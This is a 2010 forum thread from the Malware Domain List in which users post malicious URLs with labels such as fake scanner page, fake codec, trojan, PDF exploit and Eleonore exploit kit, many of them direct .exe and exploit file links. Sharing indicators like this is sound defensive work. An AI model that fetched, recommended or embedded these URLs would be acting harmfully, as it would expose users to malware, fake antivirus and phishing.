Malware Domain List

Malware Related => Malicious Domains => Topic started by: lelenina on June 13, 2010, 05:09:16 pm

Title: Malicious Domains by Lelenina
Post by: lelenina on June 13, 2010, 05:09:16 pm
Code: [Select]
http://memory-scanner.com
Fake Scanner Page
Code: [Select]
http://scanner-models.com
Fake Scanner Page
Code: [Select]
http://globalwarmingtray.info/nc12/index.php?ID=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 13, 2010, 10:42:57 pm
Code: [Select]
http://justatube.com
Fake Porn Site
Code: [Select]
http://real-tube.org
Fake Porn Site
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 14, 2010, 01:58:36 am
Code: [Select]
http://baronessan.se/.9k7ea/?getexe=se1ws.exe
Koobface
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 16, 2010, 07:31:43 pm
Code: [Select]
http://ohh.please-unblock-me.com/?oazagezitv
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 17, 2010, 10:32:47 pm
Code: [Select]
http://scanner-glass.com
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 19, 2010, 04:38:49 pm
Code: [Select]
http://scanner-manufacturer.com
Fake Scanner Page
Code: [Select]
http://scanner-glass.com
Fake Scanner Page
Code: [Select]
http://code-scanner.com
Fake Scanner Page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 21, 2010, 09:05:09 pm
Code: [Select]
http://laser-copier.com
Fake Scanner Page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 29, 2010, 05:08:52 am
Code: [Select]
http://rmets.biz/cgi-bin/cn.aspx?ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU5EZzFPVFl3T0RVaU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8xT2lJek5qWTJPU0k3Y3pvME9pSnJjSEJwSWp0ek9qTTZJams1T1NJN2ZYTTZNem9pYldRMUlqdHpPak15T2lJek9EZ3daV0pqTldJME9USTNOVE5qTlRZMk56azJPREkzTURJeE9URTJOeUk3ZlE9PQ%3D%3D/s00a106201317r0409Xf1646355Ybd4d7a0fZ0100f080
NeoSploit
Code: [Select]
http://fairscansecurity.com
Fake Scanner Page
Code: [Select]
http://cheapscansecurity.com/
Fake Scanner Page
Code: [Select]
http://burnscansecurity.com/
Fake Scanner Page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 01, 2010, 04:06:35 am
Code: [Select]
http://best-scanner-2010.com/
Fake Scanner Page
Code: [Select]
http://mega-scan-pc-new14.net/?code=1500
Fake Scanner Page
Code: [Select]
http://mugyra.org/sutra/in.cgi?15=&ID=1
Redirects to Fake Vimes
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 01, 2010, 06:51:19 am
Code: [Select]
http://super-tubes-mego.com/xplay.php?id=45230
http://member-tube.com/xplay.php?id=40081
http://clear-web-tube.com/xplay.php?id=40081
http://modern-tube.net/xplay.php?id=45230
http://Last-sex-tube.com
http://best-tube-world.com/xplay.php?id=40081
http://sunny-tube-house.com/xplay.php?id=45043
http://super-cool-tube.net/xplay.php?id=45284
http://suoer-mego-tubes.com/xplay.php?id=40081
http://clear-great-tube.com/xplay.php?id=45284
All of them are fake porn sites.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 02, 2010, 01:15:11 am
Code: [Select]
http://www3.epic10.co.cc/?p=p52dcWltbV%2FRlsijZFahqJ51nF6ZZGSdkZzHlGk%3D
Redirects to fake scanner page
Code: [Select]
http://www2.sunclear.co.cc/?p=p52dcWltbV%2FCj8bYboN6dYhe0KCfYWCcU9LXoKitaVzHysd2lJN%2Fel6orKWeZZWdZWRkmGublWWIo6THodjXoFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1mmaQYWKaW5Scm19oY2qL08ifb1qtp3VlanCZXZeZYmJjWqarlmqTYmeeXZaXlGNtWJnInriMWKuimHVsams%3D
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 03, 2010, 06:12:48 am
Code: [Select]
http://ultimatewide.in/4/getexe.php?spl=mdac
Insain trojan
Code: [Select]
http://gromalines.pl.ua/grad/222/ya.php
Redirects to fake scanner page
Code: [Select]
http://highsecurityscan.com
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 04, 2010, 03:36:52 am
Code: [Select]
http://hotsecurityscan.com
fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 05, 2010, 03:24:25 am
Code: [Select]
http://www4.omgomg9.co.cc/?p=p52dcWltbV%2FRlsijZFahqJ51nV7DZJadk5zHmJI%3D
Redirects to fake scanner page
Code: [Select]
http://www1.truefind44p.co.cc/?p=p52dcWltbV%2FCj8bYboN6dYhe0KCfYWCcU9LXoKitaVzHysd2lJN%2Fel6orKWeZpXHZZZkmmubmY6Io6THodjXoFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1mmaQYWKaW5Scm19oY2qL08ifb1qtp3VlanCZX52faWVjWqarlmqTYmeeX5ydm2ZtWJnInriMWKuimHVsams%3D
Fake scanner page
Code: [Select]
http://opensecurityscan.com/
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 05, 2010, 05:45:14 am
Code: [Select]
http://ad.googleanaliticks.com/info/u2.html/s002106204317r0409Rabff69a9Xbba2610cY3b3f5a86Z0100f060
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 05, 2010, 06:54:54 am
Code: [Select]
http://dasafa.info/page/new.php/s002106201317r0409Ra38dbe4fX865af0a8Yca6a16c0Z0100f080
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 06, 2010, 06:03:45 pm
Code: [Select]
http://new-tube-fest.com/xplays.php?id=45031
fake movie site
Code: [Select]
http://designnewmedia.com/video-plugin.45031.exe
fake codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 08, 2010, 09:49:44 pm
Code: [Select]
http://billivilli.co.cc/bilvil/nc111/nc.php?uid=2114&pid=3
Redirects to fake scanner page
Code: [Select]
http://sendyourtraffic41.org/elka/404.php
Redirects to fake scanner page
Code: [Select]
http://best-online2.com/tds_privatcoin_go1.php?ID=100000
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 08, 2010, 10:20:59 pm
Code: [Select]
http://rheal.biz/cgi-bin/cn.aspx?ID=100000
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 09, 2010, 07:02:59 am
Code: [Select]
http://huyqvpeotwyn.com/tre/sena.py
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 09, 2010, 07:08:27 am
Code: [Select]
http://digitalmediasonic.com/video-plugin.45031.exe
Fake codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 09, 2010, 07:17:49 pm
Code: [Select]
http://superupdates.com/video-plugin.45031.exe
Fake codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 10, 2010, 02:58:13 am
Code: [Select]
http://dotroot.tk/1.php?ID=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 10, 2010, 08:03:25 am
Code: [Select]
http://b23.ru/e1ij
Facebook phisher
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 11, 2010, 03:04:07 am
Code: [Select]
http://4info-tools.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 11, 2010, 06:09:33 am
Code: [Select]
http://freemovieswww.info/player_update/divx_fix_patch.exe
Trojan TDSS
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 02:54:03 am
Code: [Select]
http://parkinssu.info/hb/
Fake Scanner Page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 06:20:43 am
Code: [Select]
http://mediapromedia.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 10:28:44 pm
Code: [Select]
http://caazzaport.co.cc/caaza/go.php?sid=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 10:29:58 pm
Code: [Select]
http://yastatic.co.cc/333/ya.php
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 10:57:54 pm
Code: [Select]
http://rmetsih.biz/cgi-bin/cn.aspx?ID=1
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 12:09:30 am
Code: [Select]
http://dvdmusicinfo.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 02:44:51 am
Code: [Select]
http://everytds.tk/in.cgi?3=&ID=1
Redirects to fake porn site
Code: [Select]
http://vogel-tube.com/xfreeporn.php?id=45309
Fake porn site
Code: [Select]
http://digitalmediaset.com/video-plugin.45309.exe
Trojan
Code: [Select]
http://digitalmediaset.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 02:50:21 am
Code: [Select]
http://onlyscan.tk/goo/oCi8j.pdf
Pdf exploit. I believe it installs Defense Center.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 03:02:10 am
Code: [Select]
http://onlyscan.tk/goo/zCue.class
Exploit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 07:35:20 am
Code: [Select]
http://digitalpackback.com/New-Video-Addon.48665.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 07:11:05 pm
Code: [Select]
http://electronicbankdata.com/video-plugin.45309.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 07:33:54 pm
Code: [Select]
http://www3.doligz39td.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3JXsiYlWmdYmiaxA%3D%3D
Redirects to fake scanner page
Code: [Select]
http://www2.yourprotection86.co.cc/?p=p52dcWplanKHjsbIo22AgXOOipnVbWGWY4nT1m6uqG2Lw8ydb5aYen5arK3NaseXlmRfbJholmLFVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooWObXmGYYZGVm2llY2eZh9WemHFfqKtxaWuYZpaYY2NeZFis11%2BfYWKdZpWWlWRoYlzIxKCOhVqwnZxxcWyV
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 06:24:06 am
Code: [Select]
http://truestarmedia.com/video-plugin.45309.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 09:04:27 am
Code: [Select]
http://everytds.tk/in.cgi?4=&ID=1
redirects to exploit kit
Code: [Select]
http://dfrscanner.tk/non/index.php
Exploit kit
Code: [Select]
http://dfrscanner.tk/non/um1zi.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 09:26:28 am
Code: [Select]
http://activemedianews.com/video-plugin.45312.exe
Trojan
Code: [Select]
http://mediaservicesdata.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 10:47:05 pm
Code: [Select]
http://globstere.info/gh/
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 10:59:26 pm
Code: [Select]
http://nike1ot2n.com/ab/tmp/pdfopen.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 11:38:08 pm
Code: [Select]
http://nike1ot2n.com/ab/tmp/m.vbs
the second part of the exploit
Code: [Select]
http://nike1ot2n.com/ab/l.php?i=14
Trojan.Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 17, 2010, 04:30:37 am
Code: [Select]
http://allxscan.tk/ddt/fVJV.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 18, 2010, 02:40:03 am
Code: [Select]
http://mtravel3biz.com/in.cgi?19=&parameter=porn&mudo=dumd&ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002TmpvaU9EQXlOakUzSWp0ek9qRXlPaUpoWkhabGNuUnBjMlZmYVdRaU8zTTZOam9pTVRFNE16TTBJanR6T2pRNkltdHdjR2tpTzNNNk16b2lPVGs1SWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SWpCbU9UZzBaRE13TURrMVlqRm1aRFE0WWpVMFlXSXlNR0kyT1RobFlqUTNJanQ5
Redirects to exploit kit and fake scanner page?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 18, 2010, 05:16:47 pm
Code: [Select]
http://www.domainnamereg1.in/retn/qb0pfsg/lgut722.php
Java exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 18, 2010, 05:53:53 pm
Code: [Select]
http://92.63.107.10/223/tmp/pdfopen.pdf
Pdf exploit
Code: [Select]
http://92.63.107.10/223/tmp/m.vbs
Second part of the exploit
Code: [Select]
http://92.63.107.10/223/l.php?i=14
Trojan.Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 18, 2010, 09:46:13 pm
Code: [Select]
http://firstport.in/x/?src=kostes&id=best&o=o&ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002TmpvaU5qRXhPRGt6SWp0ek9qRXlPaUpoWkhabGNuUnBjMlZmYVdRaU8zTTZOam9pTVRJeE1UUTFJanR6T2pRNkltdHdjR2tpTzNNNk16b2lPVGs1SWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SW1Zek9UaGlOV0ppWm1abVpUaGpaRGd6WXpRNVpUTmlOalZoWkRObFpUTXlJanQ5
Directs to exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 19, 2010, 03:20:48 am
Code: [Select]
http://datadigitalonline.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 19, 2010, 03:39:01 am
Code: [Select]
http://flashdns.in/x/?src=kostes&id=best&o=o&ID=100000
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 19, 2010, 05:54:44 pm
Code: [Select]
http://fitrst.ignorelist.com/3/?c=11
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 20, 2010, 08:05:53 pm
Code: [Select]
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on July 20, 2010, 08:21:54 pm
Code: [Select]
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)

Fake scanner page is a side effect only.

It is an Eleonore exploit kit. Fake scanner URL is probably called only if exploits are unsuccessful.
Look at function complete(). I have seen such a combination before.

http://wepawet.cs.ucsb.edu/view.php?hash=8a89f74589ce966cf71a08a4d86e567b&t=1279656448&type=js
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 08:04:23 am
Code: [Select]
http://ntscanner.in/new/index.php?ID=1
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 08:17:21 am
Code: [Select]
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)

Fake scanner page is a side effect only.

It is an Eleonore exploit kit. Fake scanner URL is probably called only if exploits are unsuccessful.
Look at function complete(). I have seen such a combination before.

http://wepawet.cs.ucsb.edu/view.php?hash=8a89f74589ce966cf71a08a4d86e567b&t=1279656448&type=js
Wepawet really comes in handy when analyzing exploits.  I have that website bookmarked.  Thank you for showing me that. :)
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 07:24:02 pm
Code: [Select]
http://mtravel3biz.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://stifast31.info/bv/
Fake scanner page
Code: [Select]
http://bereto8ns.com/zbb/index.php
Exploit kit
Code: [Select]
http://superflashplayer.com/video-plugin.45031.exe
Trojan
Code: [Select]
http://theflashclub.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 10:53:08 pm
Code: [Select]
http://super-fresh-tube.com/xfreeporn.php?id=45309
Fake porn site
Code: [Select]
http://mediafirstsystems.com/video-plugin.45309.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 11:30:08 pm
Code: [Select]
http://tdsinfo.tk/in.cgi?3=&ID=10000
exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 23, 2010, 08:04:56 am
Code: [Select]
http://netmediaforum.com/video-plugin.45309.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 23, 2010, 11:11:11 pm
Code: [Select]
http://lcitsih.biz/index.php?ID=1
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 23, 2010, 11:19:46 pm
Code: [Select]
http://nimtsih.biz/l.php?i=2
Trojan.Dropper
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 24, 2010, 09:02:09 am
Code: [Select]
http://adobeflash-ver16.co.tv/zxce/install_adobe_flash.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 24, 2010, 07:52:41 pm
Code: [Select]
http://zsitsih.biz/index.php?ID=1
Exploit kit
Code: [Select]
http://nimtsih.biz/l.php?i=2
Trojan.Dropper
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 24, 2010, 08:43:47 pm
Code: [Select]
http://dandbcorporation.com/l.php?i=14
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 24, 2010, 10:19:38 pm
Code: [Select]
http://awrinc.net/style/images/go.php?sid=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 25, 2010, 05:06:47 am
Code: [Select]
http://bellday.ru:8080/index.php?pid=10
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 28, 2010, 04:31:11 am
Code: [Select]
http://illinated.co.in/index.php?ID=1
Exploit kit
Code: [Select]
http://illinated.co.in/tmp/libtiff.pdf
Pdf exploit
Code: [Select]
http://illinated.co.in/l.php?i=14
Trojan.Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 28, 2010, 08:42:50 am
Code: [Select]
http://scripttoscan.co.cc/installer.0042.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 28, 2010, 08:34:46 pm
Code: [Select]
http://www3.trust-av41.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXsiYk2mbY5udkQ%3D%3D
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 29, 2010, 03:43:45 am
Code: [Select]
http://averagedaddy.com/?showc=vindictus
Redirects to fake scanner page?  According to Norton Safeweb.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 29, 2010, 06:56:46 am
Code: [Select]
http://213.155.29.144/news/l.php?deserialize=1b&i=
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 29, 2010, 08:31:06 am
Code: [Select]
http://temptrouble.in/4/index.php
Exploit kit
Code: [Select]
http://temptrouble.in/4/getexe.php?spl=mdac
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 30, 2010, 01:33:26 am
Code: [Select]
http://allvexxx.tk/1/index.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 30, 2010, 11:15:10 pm
Code: [Select]
http://avadrom.co.in/index.php?ID=1
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 31, 2010, 05:03:54 am
Code: [Select]
http://red-xxx-tube.net/cgi-bin/setuppatch.pl?adv=1481
Trojan
Code: [Select]
http://capdataservice.com/New-Video-Addon.48577.exe
Trojan
Code: [Select]
http://hotxtubeonline.com/mov524/movie.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 31, 2010, 08:58:36 am
Code: [Select]
http://11.wenmo.in/x/index.php?s=036cb76056fdbc21df981dec95f43cb6
Exploit kit
Code: [Select]
http://11.wenmo.in/x/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 31, 2010, 10:32:25 pm
Code: [Select]
http://allmediavision.com/New-Video-Addon.48440.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 03:57:32 pm
Code: [Select]
http://bestdatawork.com/video-plugin.45035.exe
Trojan
Code: [Select]
http://filesserveronline.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 04:17:59 pm
Code: [Select]
http://psoriasisinstruction.com/wp-content/43/sexy-bodies.html
Java on screen popup leads to fake codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 05:13:07 pm
Code: [Select]
http://video39-tube.servepics.com/video.php?l=6:09&id=1&n=teen&a=nEcroS&path=./tmb/teen/03.jpg&rat=./img/rating5.jpg&v=20750
Leads to fake AV disguised as a codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 05:15:11 pm
Code: [Select]
http://tube-hosting270.sytes.net/getfile95666/flash_player_installer.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 06:16:43 pm
Code: [Select]
http://videos90-host.redirectme.net/download-id72929/flash_player_installer.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 07:35:44 pm
Code: [Select]
http://videos90-flash.3utilities.com/?n=teen&id=1
Leads to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 07:37:22 pm
Code: [Select]
http://tube62-host.sytes.net/?n=teen&id=1
Leads to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 10:15:51 pm
Code: [Select]
http://flash36-videos.redirectme.net/?n=teen&id=1
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 11:42:08 pm
Code: [Select]
http://video96-pics.servehttp.com/?n=teen&id=1
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 04:50:47 pm
Code: [Select]
http://02.acani.in/x/index.php
Exploit kit
Code: [Select]
http://02.acani.in/x/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 05:06:47 pm
Code: [Select]
http://websmeter.com/new/index.php
Exploit kit
Code: [Select]
http://websmeter.com/new/load.php?f=1&e=4
Trojan Iflar
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 08:05:45 pm
Code: [Select]
http://flash33-hosting.servepics.com/?n=teen&id=1
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 08:07:29 pm
Code: [Select]
http://hosting17-video.3utilities.com/?n=teen&id=1
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 10:05:34 pm
Code: [Select]
http://modern-tube.net/xplays.php?id=40030
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 10:58:09 pm
Code: [Select]
http://hetupoxiy.cn/chat/bd3225fe436c29ac8474e83d3cd38c08.php?showuser=25329981&showforum=s1
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 11:34:29 pm
Code: [Select]
http://actdataonline.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 03, 2010, 01:01:46 am
Code: [Select]
http://193.105.174.53/DE/index.php
Exploit kit
Code: [Select]
http://193.105.174.53/DE/l.php?deserialize=e9&i=
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 03, 2010, 01:13:08 am
Code: [Select]
http://ca200dajskjdhd.com/kde/index.php
Exploit kit
Code: [Select]
http://ca200dajskjdhd.com/kde/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 06, 2010, 05:18:33 am
Code: [Select]
http://178.239.48.101/index.php?q=9VGU1G21ML942SE396872SD4HB9H5PB80DX99TMS00203MN3UO4XD4U4Z7PzcpQRhbVTE8VmtbNzlSXmlRU044IU00NlAlUCw%252BDglqaQsNenxrCB4DAQcxf09kMwAkJwJlBWsHNSFnBnRRB3R4XFIAYSALAQNZAAVrJgcrcwE0BGJ6CQBzaQ4JbDk2Q0Q%253D
Fake scanner page
Code: [Select]
http://acer.is-a-geek.net/3/?c=917
Fake scanner page
Code: [Select]
http://digitalartfact.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 07, 2010, 12:37:17 am
Code: [Select]
http://bondbm3x.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://mohotwrxst.info/hn
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 07, 2010, 05:26:18 am
Code: [Select]
http://fchfdghfg.tk/new/index.php?ID=1
Exploit kit
Code: [Select]
http://fchfdghfg.tk/new/41fdcb12a4bc143f98999fcda8927ecc.pdf
Pdf exploit
Code: [Select]
http://fchfdghfg.tk/new/load.php?f=1&e=2
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 07, 2010, 08:29:48 pm
Code: [Select]
http://sixpornvideos.in/pornhub/animal-porn-movie.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 08, 2010, 07:09:06 am
Code: [Select]
http://xatechbot.com
Leads to fake codec
Code: [Select]
http://0scene.info
Leads to trojans
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 08, 2010, 10:51:04 pm
Code: [Select]
http://www.hookranger.info/tx/
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 06:54:26 am
Code: [Select]
http://ssdssds.co.cc/x/index.php?s=8b02a28ea6391cdd77172f450ecf4855&ID=1
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 07:03:27 am
Code: [Select]
http://ssdssds.co.cc/x/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 09:06:28 pm
Code: [Select]
http://fastsofon.com/any3/5-direct.ex
Fake AV?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 10:10:09 pm
Code: [Select]
http://www3.real-security83.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3LXpqYnGlvZZeVkQ%3D%3D
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 10:31:35 pm
Code: [Select]
http://www.searchfertile.com/a/ad
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 10, 2010, 09:53:48 am
Code: [Select]
http://max3wrxstia.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://www.lancergooe.info/yu/
Fake scanner page
Code: [Select]
http://nolewe0ret.com/ab/index.php
Exploit kit
Code: [Select]
http://nolewe0ret.com/ab/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 10, 2010, 08:12:06 pm
Code: [Select]
http://www.offline.pt/template/go.php?sid=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 10, 2010, 10:19:59 pm
Code: [Select]
http://datzsdt.co.cc/x/index.php
Exploit kit
Code: [Select]
http://datzsdt.co.cc/x/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 11, 2010, 02:15:33 am
Code: [Select]
http://ppcube.com/in.cgi?8
Redirects to fake porn site and fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 11, 2010, 06:36:54 am
Code: [Select]
http://engsquad.com/?affid=387&subid=landing
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 11, 2010, 06:48:00 am
Code: [Select]
http://lilumy3wxt.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://n2lewe1ret.com/ab/index.php
Exploit kit
Code: [Select]
http://n2lewe1ret.com/ab/l.php
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 11, 2010, 07:02:11 pm
Code: [Select]
http://matthall.com.au/properties/index.php
Eleonore Exploit pack version 1.3.2
Code: [Select]
http://matthall.com.au/properties/statss.php?exefile=1
Control panel of Eleonore Exploit pack version 1.3.2
Code: [Select]
http://matthall.com.au/properties/load.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 12, 2010, 10:12:56 pm
Code: [Select]
http://mainstep.in/4/index.php
Exploit kit
Code: [Select]
http://mainstep.in/4/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 13, 2010, 04:46:56 am
Code: [Select]
http://pradolast.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://mobielast.com/ab/index.php
Exploit kit
Code: [Select]
http://mobielast.com/ab/l.php
Fake AV
Title: Re: Malicious Domains by Lelenina
